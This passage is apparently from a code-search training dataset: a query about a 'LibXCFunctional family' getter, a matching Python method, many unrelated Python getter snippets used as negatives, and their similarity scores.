unique_id(self):\n return self._device.mac", "def generate_fwan_process_id() -> str:\n return str(uuid.uuid4())", "def getId(self):\n return _libsbml.SubListOfSpeciesFeatures_getId(self)", "def test_id():\n with expected_protocol(\n DCXS,\n [(\"?\", \"DCXS750-4\"), ],\n ) as inst:\n assert inst.id == \"DCXS750-4\"", "def unique_id(self) -> str:\n return get_frigate_entity_unique_id(\n self._config_entry.entry_id, \"sensor_detector_speed\", self._detector_name\n )", "def get_uuid():\n return str(uuid4())", "def get_id(self):\n \"\"\"Requires use of Python 3\"\"\"\n return str(self.id)", "def unique_id(self):\n return self.device_id + '_' + self._sensor_type", "def get_uuid():\n\n return str(uuid.uuid4())", "def getID(self):\r\n return self._interface.UID", "def id(self):\n return id(self._component)", "def setId(self, *args):\n return _libsbml.FunctionDefinition_setId(self, *args)", "def get_uuid():\n\n x = uuid.uuid1()\n return str(x)", "def unique_id(self):\n return self._deviceId", "def getuid():\n if current().subtype == TestSubType.Example:\n testname = f\"{basename(parentname(current().name)).replace(' ', '_').replace(',','')}\"\n else:\n testname = f\"{basename(current().name).replace(' ', '_').replace(',','')}\"\n\n for char in ['(', ')', '[', ']','\\'']:\n testname = testname.replace(f'{char}', '')\n\n return testname + \"_\" + str(uuid.uuid1()).replace('-', '_')", "def getID(self) -> int:\n ...", "def unique_id(self):\n return f\"{self.device.id}-{self.key}\"", "def getIdAttribute(self):\n return _libsbml.SBase_getIdAttribute(self)", "def known_uid():\n return '48ee71d9-20f0-41fc-a99f-c518121a880e'", "def getId(self):\n return _libsbml.QualitativeSpecies_getId(self)", "def makeid(cls):\n return str(uuid.uuid4().hex)", "def cred_def_id(self) -> str:\n return self._cred_def_id", "def _get_uuid():\n return str(uuid.uuid4())", "def uid():\r\n u = str(uuid.uuid4())[:22]\r\n u = u.replace(\"-\",\"_\")\r\n return u", "def file_system_id(self) -> str:\n return pulumi.get(self, \"file_system_id\")", "def getIdent (self) :\n return self.id", "def getId(self):\n return _libsbml.FluxBound_getId(self)", "def new_case_id():\n return uuid.uuid4().hex", "def new_case_id():\n return uuid.uuid4().hex", "def identifier(self):\r\n return self.id", "def get_device_id(self) -> str:\n return Config.get('device_id')", "def get_ir_identifier(dataset_type, FOLD, AUTHOR, POST):\n global FEATURES_STR\n return dataset_type + '-ir-fo' + str(FOLD) + '-fe' +\\\n FEATURES_STR + '-a' + str(AUTHOR) + '-p' + str(POST)", "def unique_identifier(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"unique_identifier\")", "def getId(self):\n return _libsbml.Species_getId(self)", "def cal_guid(self):\n return 'setup' + str(self.id) + '@lnldb'" ]
[ "0.65617096", "0.63113815", "0.6098559", "0.6041057", "0.59945154", "0.5900914", "0.587187", "0.58197254", "0.5804145", "0.5734139", "0.57230854", "0.5713289", "0.57015187", "0.5693463", "0.56737447", "0.5662043", "0.56479746", "0.5644955", "0.5611577", "0.5568527", "0.5564561", "0.55570626", "0.5556264", "0.55559456", "0.55281705", "0.5520941", "0.55080426", "0.5491368", "0.5480187", "0.54696286", "0.546906", "0.5468594", "0.5438764", "0.54367995", "0.54291695", "0.542747", "0.5425614", "0.54183155", "0.5408875", "0.540208", "0.5399488", "0.5389739", "0.53896", "0.5384865", "0.5383634", "0.53799284", "0.53692716", "0.53620356", "0.53596073", "0.5358471", "0.53495586", "0.5348274", "0.534189", "0.53411585", "0.5340756", "0.53327817", "0.5330289", "0.5330289", "0.5330289", "0.5330289", "0.53245103", "0.53245103", "0.53245103", "0.5322585", "0.53189903", "0.5313854", "0.5313333", "0.5310052", "0.5309549", "0.5309423", "0.5301645", "0.53012234", "0.52975595", "0.52904785", "0.5290093", "0.5282531", "0.5279771", "0.52731586", "0.52709854", "0.52708495", "0.5270839", "0.5269107", "0.5267232", "0.5253802", "0.52519417", "0.5245526", "0.5244594", "0.52418315", "0.5236693", "0.5228939", "0.5224563", "0.52241313", "0.52236986", "0.5223173", "0.5223173", "0.52198493", "0.5217585", "0.52145046", "0.52049947", "0.5201885", "0.5199752" ]
document_score: 0.0
document_rank: -1
query: Returns the LibXCFunctional kind.
document: def get_kind(self): return self._kind
metadata: { "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_type(self):\n return self.get_udev_property('ID_FS_TYPE')", "def kind(self):\n return self.get_data(\"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def kind(self) -> str:\n return pulumi.get(self, \"kind\")", "def get_fs_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetFsType', self.handle)", "def get_kind(self, ):\n return self.get_parameter('kind')", "def kind(self):\n return self._kind()", "def kind(cls):\n return cls.__name__", "def kind(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"kind\")", "def _get_kind(cls):\n return cls.__name__", "def cfunc_type(self):\n tif = ida_typeinf.tinfo_t()\n result = self.get_func_type(tif)\n if not result:\n return\n return tif", "def kind(self):\n return self._kind", "def kind(self):\n return self._kind", "def logictype(self):\n if (self.symbol.type == self.scanner.LOGIC_TYPE):\n device_kind_string = self.names.get_name_string(self.symbol.id)\n device_kind = self.names.query(device_kind_string)\n self.symbol = self.scanner.get_symbol()\n return device_kind\n else:\n # Error: Valid Logic gate required e.g. 
'AND'\n # Stopping symbols: ';' , '}', 'CONNECT', 'MONITOR' or 'END'\n # KEYWORD\n self.error(\n self.LOGIC_GATE, [\n self.scanner.KEYWORD, self.scanner.SEMICOLON,\n self.scanner.RIGHT_CURLY], [\n self.scanner.CONNECT_ID, self.scanner.MONITOR_ID,\n self.scanner.END_ID])\n return None", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[str]:\n return pulumi.get(self, \"kind\")", "def resource_kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"resource_kind\")", "def get_type(self):\n\t\treturn call_sdk_function('PrlFsInfo_GetType', self.handle)", "def kind(self):\n # type () -> str\n return np.dtype(self.type).kind", "def kind(self):\r\n return TypeKind.from_id(self._kind_id)", "def kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"kind\")", "def kind(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"kind\")", "def fstype(self):\n return self._properties.get('fstype')", "def kind(self) -> Optional[pulumi.Input[Union[str, 'Kind']]]:\n return pulumi.get(self, \"kind\")", "def device_type(self):\n # type: () -> string_types\n return self._device_type", "def kind(self) -> \"TriggerEventKind\":\n return TriggerEventKind.from_value(self._attrs.get(\"kind\"))", "def _kind(d):\n return _SYMBOL_KIND_MAP.get(d.type)", "def test_ds18b20_get_kind(self):\n assert_equal(self.test_ds18b20.get_kind(), 'mpds18b20')", "def GetKind(self):\r\n\r\n return self.kind", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def device_type(self):\n return Context.devtype2str[self.device_typeid]", "def get_type_functional_name(type):\n name = type.name\n if type.is_simple:\n return name\n elif type.is_enum:\n return 'str'\n elif type.is_complex:\n return get_class_name(name)", "def kind(self):\n raise NotImplementedError()", "def service_kind(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"service_kind\")", "def functional(self):\n return self.vasprun.run_type", "def type(self):\n return self._device.type_name", "def workload_kind(self):\n return self.workload_arg(arg=\"kind\", default=\"pod\")", "def kind(self):\n # type () -> str\n if pa.types.is_date(self.arrow_dtype):\n return \"O\"\n else:\n return np.dtype(self.arrow_dtype.to_pandas_dtype()).kind", "def test_probehealth_get_kind(self):\n assert_equal(self.test_probehealth.get_kind(), 'mpprobehealth')", "def _cim_feature_type():\n return {\n 'name' : 'cim_feature_type',\n 'is_open' : False,\n 'doc' : None,\n 'members' : [\n ('file', None),\n ('diagnostic', None),\n ],\n }", "def file_type(self):\n try:\n return self.get_driver().ShortName\n except AttributeError:\n return", "def kind(self, kind: \"TriggerEventKind\"):\n if isinstance(kind, Enum):\n self._attrs[\"kind\"] = kind.value\n else:\n self._attrs[\"kind\"] = kind # If you supply a string, we presume you know the service will take it.", "def _device_type_returner(self, symbol):\n if self.names.get_name_string(symbol.id) == \"AND\":\n return self.devices.AND\n if self.names.get_name_string(symbol.id) == \"OR\":\n return self.devices.OR\n if self.names.get_name_string(symbol.id) == \"NAND\":\n return self.devices.NAND\n if self.names.get_name_string(symbol.id) == \"NOR\":\n return self.devices.NOR\n if self.names.get_name_string(symbol.id) == 
\"XOR\":\n return self.devices.XOR\n if self.names.get_name_string(symbol.id) == \"CLOCK\":\n return self.devices.CLOCK\n if self.names.get_name_string(symbol.id) == \"SWITCH\":\n return self.devices.SWITCH\n if self.names.get_name_string(symbol.id) == \"DTYPE\":\n return self.devices.D_TYPE\n if self.names.get_name_string(symbol.id) == \"SIGGEN\":\n return self.devices.SIGGEN", "def kind(self):\n return self.__key.kind()", "def _get_fcoe_intf_port_type(self):\n return self.__fcoe_intf_port_type", "def get_resource_type(self):\n category = self.get_first_category(DATA_KIND_SCHEME)\n if category is not None:\n return category.label\n else:\n return None", "def getTypeCode(self):\n return _libsbml.FunctionDefinition_getTypeCode(self)", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def CFN_RESOURCE_TYPE_NAME(cls) -> str:\n return jsii.sget(cls, \"CFN_RESOURCE_TYPE_NAME\")", "def get_func_type(self, *args):\n return _ida_hexrays.cfunc_t_get_func_type(self, *args)", "def device_type(self):\n return self._meta['device_type']", "def service_kind(self) -> pulumi.Input[Union[str, 'ServiceKind']]:\n return pulumi.get(self, \"service_kind\")", "def device_type(self):\n return self._device_type", "def get_type(self):\n\t\treturn call_sdk_function('PrlFsEntry_GetType', self.handle)", "def file_type(self):\n ftype = str(self.FileType)\n choices = None\n if self.FileType == 'Driver':\n choices = {\n 0x0: 'Unknown',\n 0x1: 'Printer',\n 0x2: 'Keyboard',\n 0x3: 'Language',\n 0x4: 'Display',\n 0x5: 'Mouse',\n 0x6: 'Network',\n 0x7: 'System',\n 0x8: 'Installable',\n 0x9: 'Sound',\n 0xA: 'Comms',\n 0xB: 'Input Method',\n 0xC: 'Versioned Printer',\n }\n elif self.FileType == 'Font':\n choices = {\n 0x1: 'Raster',\n 0x2: 'Vector',\n 0x3: 'Truetype',\n }\n if choices != None:\n subtype = obj.Object('Enumeration', 0x28, vm = self.obj_vm, parent = self, choices = choices)\n ftype += \" (\" + str(subtype) + \")\"\n\n return ftype", "def compliance_type(self) -> str:\n return pulumi.get(self, \"compliance_type\")", "def test_snmpdisk_get_kind(self):\n assert_equal(self.test_snmpdisk.get_kind(), 'mpsnmpdisk')", "def GetKind(self):\n\n pass", "def GetKind(self):\n\n return self._persistentHandler.GetKind()", "def datatype(f):\n from numpy import bool, uint8, uint16, int32\n code = f.dtype\n if code == bool: type='binary'\n elif code == uint8: type='uint8'\n elif code == uint16: type='uint16'\n elif code == int32: type='int32'\n else:\n assert 0,'Does not accept this typecode: %s' % code\n return type", "def device_type(self):\r\n return self._arm.device_type", "def get_kind_name(self) -> str:\n\n return self.kindName_", "def getTypeCode(self):\n return _libsbml.SpeciesFeatureType_getTypeCode(self)", "def isFunctionalEntity(*args):\n return _libsbml.SBO_isFunctionalEntity(*args)", "def kind(self):\n return self._accepted_class", "def drive_type():", "def test_snmpcustom_get_kind(self):\n assert_equal(self.test_snmpcustom.get_kind(), 'mpsnmpcustom')" ]
[ "0.5934257", "0.5878089", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.582752", "0.5819375", "0.58169264", "0.5813604", "0.57783896", "0.5737581", "0.5737581", "0.5679485", "0.56524044", "0.5652121", "0.5651738", "0.5651738", "0.5581144", "0.55534375", "0.55534375", "0.55534375", "0.55534375", "0.5551814", "0.5546409", "0.55282646", "0.55231833", "0.55194193", "0.55194193", "0.55194193", "0.5507177", "0.5494091", "0.548742", "0.5424947", "0.54020077", "0.5380507", "0.5348951", "0.53197294", "0.53197294", "0.5293546", "0.52918947", "0.52845335", "0.5249846", "0.52474034", "0.5237344", "0.52215695", "0.52117324", "0.5190694", "0.5152101", "0.51481426", "0.5145331", "0.5141768", "0.5136337", "0.51360655", "0.5135424", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5134249", "0.5127907", "0.5107817", "0.50991464", "0.50938493", "0.508911", "0.5089071", "0.5075883", "0.5058665", "0.5052307", "0.5043387", "0.50250185", "0.4988023", "0.49863183", "0.49854717", "0.49847293", "0.49804157", "0.49773416", "0.49757516" ]
document_score: 0.552994
document_rank: 45
query: Returns the LibXCFunctional name.
document: def get_name(self): return self._name
metadata: { "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def name(self):\n name = self.function_name\n\n # Feature type is based on additional data that used\n # for example if insight is for Healthsites Facilities\n # than feature type is Healthsites Facilities\n\n if self.feature_type:\n name = '%s for %s' % (name, self.feature_type)\n return name", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def function_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"function_name\")", "def name(self):\n\t\treturn self._func_name", "def function_name(cls):\n function_name = String(cls.__name__).snakecase().lower()\n return function_name", "def __name__(self):\n return '_'.join([function.__name__ for function in self.functions])", "def function_name(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"function_name\")", "def display_name(self) -> str:\n return f\"{self.func.__module__}.{self.func.__qualname__}\"", "def getName(self):\n return _libsbml.FunctionDefinition_getName(self)", "def name(self):\n _LOGGER.debug(self._shelly_cloud_device_name + ' >>> ' +\n self._shelly_cloud_entity_name + ' >>> name() >>> ' +\n self._shelly_cloud_device_name)\n return self._shelly_cloud_device_name", "def get_function_name(self):\n return self.__function", "def get_class_functional_name(name):\n name = _strip_class_name(name)\n return name", "def name(cls):\n return arg.s()(cls.func).func.__name__", "def _function_name(func):\n return \"Calling the function: def {}()\".format(func.__name__)", "def function(self) -> str:\n return pulumi.get(self, \"function\")", "def get_type_functional_name(type):\n name = type.name\n if type.is_simple:\n return name\n elif type.is_enum:\n return 'str'\n elif type.is_complex:\n return get_class_name(name)", "def get_name(self):\n bcname = _pychidg.f90wrap_get_name(self=self._handle)\n return bcname", "def name() -> str:\n pass", "def name(self):\n return f\"{get_device_name(self._data, 0, self._name)}\"", "def getElementName(self):\n return _libsbml.FunctionDefinition_getElementName(self)", "def get_name() -> str:\n pass", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getElementName(self):\n return _libsbml.FunctionTerm_getElementName(self)", "def function_name_to_string(func):\n if func == statistical_parity_difference:\n return \"Statistical Parity Difference\"\n if func == theil_index:\n return \"Theil Index\"\n if func == equal_opportunity_difference:\n return \"Equal Opportunity Difference\"\n if func == disparate_impact:\n return \"Disparate Impact\"\n if func == average_odds_difference:\n return \"Average Odds Difference\"\n if func == auc:\n return \"AUC\"\n if func == binary_accuracy:\n return \"Binary Accuracy\"", "def get_name() -> str:", "def get_name(self):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)", "def fname(func: Callable) -> str:\n return \"{}.{}\".format(func.__module__, func.__name__)", "def get_name():\n return __name__", "def name(self) -> str: # pragma: no cover", "def nice_name():\n\n pass", "def fortran_function(self) -> str:\n return ''.join([i.fortran_function() for i in self.instances])", "def get_name():", "def 
getName(self):\n\t\traise NotImplementedError(\"Function not implemented.\")", "def fname(func):\n return \"%s.%s\" % (func.__module__, func.__name__)", "def getElementName(self):\n return _libsbml.ListOfFunctionDefinitions_getElementName(self)", "def get_function(self,attr):\n func_name = self._user_funcs[attr] \n if hasattr(func_name,'__call__'):\n func_name = func_name(self)\n return func_name", "def name(self):\n return str()", "def get_function_name(ifunc, *, scoped=False, mangle=False):\n\n name = _translate_function_name(interrogate_function_name(ifunc), mangle)\n\n if scoped:\n parent = interrogate_function_class(ifunc)\n if parent:\n name = get_type_name(parent, scoped=True, mangle=mangle) + '.' + name\n\n return name", "def name():\n pass", "def name():\n pass", "def getElementName(self):\n return _libsbml.ListOfSpeciesFeatures_getElementName(self)", "def get_name(self) -> str:\n pass", "def name(self):\n return self._tf.name", "def get_fmu_name(self):\n return self.name", "def python_name(self):\n return self.requirement.name", "def getElementName(self):\n return _libsbml.SpeciesFeatureType_getElementName(self)", "def getName(self):\n return _libsbml.FbcExtension_getName(self)", "def as_function_name(self, string):\n return idaapi.COLSTR(string, idaapi.SCOLOR_CNAME)", "def getName(self):\r\n return self.__name__", "def get_function_name():\n\n # inspect.stack()[0][2] returns name of this function\n function_name = inspect.stack()[1][3]\n\n return function_name", "def get_name(app):\n from uuid import uuid4 as uuid\n return (f'accelpy_{app[\"application\"][\"product_id\"]}'\n f'_{str(uuid()).replace(\"-\", \"\")[:8]}')", "def get_qual_name(func: object) -> str:\n return func.__module__ + \".\" + func.__name__", "def funcName():\r\n import sys\r\n return sys._getframe(1).f_code.co_name", "def function_name(func):\n return log(level=\"info\", message=_function_name(func))", "def get_name(self) -> str:\n raise NotImplementedError", "def get_function_name(wrapped, instance, args, kwargs):\n return wrapped.__name__", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def Name(self) -> str:", "def get_name(self) -> str:\n return self.__name", "def getElementName(self):\n return _libsbml.ListOfFunctionTerms_getElementName(self)", "def funcname(func):\n try:\n return '%s()' % func.__name__\n except AttributeError:\n return repr(func)", "def name(self):\n return f\"{self.device_name} {self.device_variable}\"", "def getElementName(self):\n return _libsbml.SpeciesFeature_getElementName(self)", "def whoami(self):\n func_name = inspect.stack()[1][3]\n if func_name[:5] == 'test_':\n return func_name[5:]", "def get_func_name(func, resolv_alias=True, win_characters=True):\r\n if hasattr(func, '__module__'):\r\n module = func.__module__\r\n else:\r\n try:\r\n module = inspect.getmodule(func)\r\n except TypeError:\r\n if hasattr(func, '__class__'):\r\n module = func.__class__.__module__\r\n else:\r\n module = 'unknown'\r\n if module is None:\r\n # Happens in doctests, eg\r\n module = ''\r\n if module == '__main__':\r\n try:\r\n filename = os.path.abspath(inspect.getsourcefile(func))\r\n except:\r\n filename = None\r\n if filename is not None:\r\n # mangling of full path to filename\r\n parts = filename.split(os.sep)\r\n if parts[-1].startswith('<ipython-input'):\r\n # function is defined in an IPython session. The filename\r\n # will change with every new kernel instance. 
This hack\r\n # always returns the same filename\r\n parts[-1] = '__ipython-input__'\r\n filename = '-'.join(parts)\r\n if filename.endswith('.py'):\r\n filename = filename[:-3]\r\n module = module + '-' + filename\r\n module = module.split('.')\r\n if hasattr(func, 'func_name'):\r\n name = func.func_name\r\n elif hasattr(func, '__name__'):\r\n name = func.__name__\r\n else:\r\n name = 'unknown'\r\n # Hack to detect functions not defined at the module-level\r\n if resolv_alias:\r\n # TODO: Maybe add a warning here?\r\n if hasattr(func, 'func_globals') and name in func.func_globals:\r\n if not func.func_globals[name] is func:\r\n name = '%s-alias' % name\r\n if inspect.ismethod(func):\r\n # We need to add the name of the class\r\n if hasattr(func, 'im_class'):\r\n klass = func.im_class\r\n module.append(klass.__name__)\r\n if os.name == 'nt' and win_characters:\r\n # Stupid windows can't encode certain characters in filenames\r\n name = _clean_win_chars(name)\r\n module = [_clean_win_chars(s) for s in module]\r\n return module, name", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def getName(self) -> unicode:\n ...", "def GetModernizedTestName(self, arg):\n return arg", "def test_name(self):\r\n parts = []\r\n if self.test.__module__ != '__main__':\r\n parts.append(self.test.__module__)\r\n if hasattr(self.test, 'im_class'):\r\n parts.append(self.test.im_class.__name__)\r\n parts.append(self.test.__name__)\r\n return '.'.join(parts)", "def get_name(self): #Doctests, pour tester directement les méthodes\n return self.__name", "def name():\n\n pass", "def source_test_file_name():\n return 'feature'", "def _get_func_name(func):\n parts = []\n module = inspect.getmodule(func)\n if module:\n parts.append(module.__name__)\n\n qualname = func.__qualname__\n if qualname != func.__name__:\n parts.append(qualname[: qualname.find(\".\")])\n\n parts.append(func.__name__)\n return \".\".join(parts)", "def name(self):\n # type: () -> string_types\n return self._name", "def name(self):\n # type: () -> string_types\n return self._name", "def get_name(self):\n raise NotImplementedError", "def get_name(self):\n raise NotImplementedError", "def get_name(self):\n raise NotImplementedError", "def get_name(self):\n raise NotImplementedError", "def name(self):\n return f\"{self.sensor_type['name']} ({self._mac[-5:]})\"", "def name(self) -> str:\n ...", "def name(self) -> str:\n ...", "def getName(self):\n return \"\"", "def fqfabric_name(self):\n return self._fqfabric_name" ]
[ "0.66209394", "0.6552643", "0.6552643", "0.6492396", "0.6492396", "0.64339757", "0.64050496", "0.63731533", "0.6299338", "0.622816", "0.6214293", "0.617792", "0.61538583", "0.61080116", "0.6059312", "0.5927638", "0.58204305", "0.58170474", "0.58135116", "0.58068055", "0.5779131", "0.5749917", "0.5736055", "0.57348925", "0.57348925", "0.57348925", "0.57348925", "0.57348925", "0.5727579", "0.5727579", "0.5727579", "0.5727579", "0.5727579", "0.5727579", "0.5718528", "0.5697139", "0.56795174", "0.56765187", "0.5676146", "0.5640277", "0.5617237", "0.56147337", "0.5614723", "0.56065434", "0.5593323", "0.558887", "0.5576054", "0.5547802", "0.55471927", "0.55390686", "0.5513824", "0.5513824", "0.55078113", "0.55069685", "0.54967725", "0.5496457", "0.5493203", "0.5471786", "0.5471764", "0.5468301", "0.5457914", "0.54528546", "0.5447624", "0.54401875", "0.54389125", "0.5432376", "0.5430814", "0.5430741", "0.5427777", "0.5427777", "0.5427777", "0.5427777", "0.5427737", "0.54036486", "0.5393519", "0.53901345", "0.5389312", "0.53883445", "0.5387963", "0.53874445", "0.53874445", "0.53874445", "0.53874445", "0.53874445", "0.53831553", "0.5383064", "0.53807086", "0.53784144", "0.5377444", "0.53769845", "0.5364541", "0.5364541", "0.5364036", "0.5364036", "0.5364036", "0.5364036", "0.535904", "0.5355906", "0.5355906", "0.5355405", "0.5355374" ]
document_score: 0.0
document_rank: -1
query: Returns the LibXCFunctional family.
document: def get_family(self): return self._family
metadata: { "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_01_GetFamily(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_1\n l_family = FamUtil.get_family(self.m_device_obj)\n # print(PrettyFormatAny.form(l_family, 'B3-01-A - Family'))\n self.assertEqual(l_family, TESTING_FAMILY_NAME_1)", "def test_02_GetFamily(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_2\n l_family = FamUtil.get_family(self.m_device_obj)\n # print(PrettyFormatAny.form(l_family, 'B3-02-A - Family'))\n self.assertEqual(l_family, TESTING_FAMILY_NAME_2)", "def device_family(self):\n return self._dll.JLINKARM_GetDeviceFamily()", "def family(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"family\")", "def get_family(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin\n return self._catalog", "def get_family(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin\n return self._catalog", "def get_family(self):\n # Implemented from template for osid.resource.ResourceLookupSession.get_bin\n return self._catalog", "def family(self) -> Optional[str]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[str]:\n return pulumi.get(self, \"family\")", "def family(self) -> Optional[str]:\n return pulumi.get(self, \"family\")", "def read_device_family(self):\n family = ctypes.c_int()\n\n result = self._lib.NRFJPROG_read_device_family(ctypes.byref(family))\n if result != NrfjprogdllErr.SUCCESS:\n raise APIError(result)\n\n return DeviceFamily(family.value).name", "def family(self):", "def get_family_name(self):\n return self.family_name", "def GetFamily(*args, **kwargs):\n return _gdi_.Font_GetFamily(*args, **kwargs)", "def model_family(self) -> str:\n return self._model_family", "def af(self):\n return self.opts_family", "def get_family(self, family_id):\n return self.__make_api_call('get/family/{}'.format(family_id))", "def GetFamilyString(*args, **kwargs):\n return _gdi_.Font_GetFamilyString(*args, **kwargs)", "def _check_family(self):\n return", "def getFamilyName(self):\n return _libsbml.ModelCreator_getFamilyName(self)", "def test_02_GetFamilyObj1(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_1\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-02-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_1)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 1)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'Insteon_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.Insteon')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'Insteon_xml')", "def family(self):\n return self.sock.family", "def find_family(self, needle):\n return self.__make_api_call('find/family/{}'.format(needle))", "def navigation_type(self):\n return 'Family'", "def test_01_Family(self):\n l_xml = self.m_xml.light_sect[0]\n print(PrettyFormatAny.form(l_xml, 'C3-01-A - XML'))\n l_device = self.m_device_obj\n l_light = FamUtil.read_family_data(self.m_pyhouse_obj, l_device, l_xml)\n print(PrettyFormatAny.form(l_light, 'C3-01-B - Light'))\n self.assertEqual(l_device.Name, TESTING_LIGHT_NAME_0)\n self.assertEqual(l_light.InsteonAddress, convert.dotted_hex2int(TESTING_INSTEON_ADDRESS_0))", "def test_04_GetFamilyObj3(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_3\n l_obj = 
FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-04-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_3)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 3)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'X10_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.X10')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'X10_xml')", "def get_nh_family(self):\n return int(self.get('nhr_family'))", "def family_name(self):\n return FAMILY_NAME", "def test_05_GetFamilyObj4(self):\n self.m_device_obj.DeviceFamily = TESTING_FAMILY_NAME_4\n l_obj = FamUtil._get_family_obj(self.m_pyhouse_obj, self.m_device_obj)\n # print(PrettyFormatAny.form(l_obj, 'B2-05-A - Family'))\n self.assertEqual(l_obj.Name, TESTING_FAMILY_NAME_4)\n self.assertEqual(l_obj.Active, True)\n self.assertEqual(l_obj.Key, 4)\n self.assertEqual(l_obj.FamilyDevice_ModuleName, 'Hue_device')\n self.assertEqual(l_obj.FamilyPackageName, 'Modules.Families.Hue')\n self.assertEqual(l_obj.FamilyXml_ModuleName, 'Hue_xml')", "def get_family_id(self):\n return self._family_id", "def family_versions(self):\n return ['1.0']", 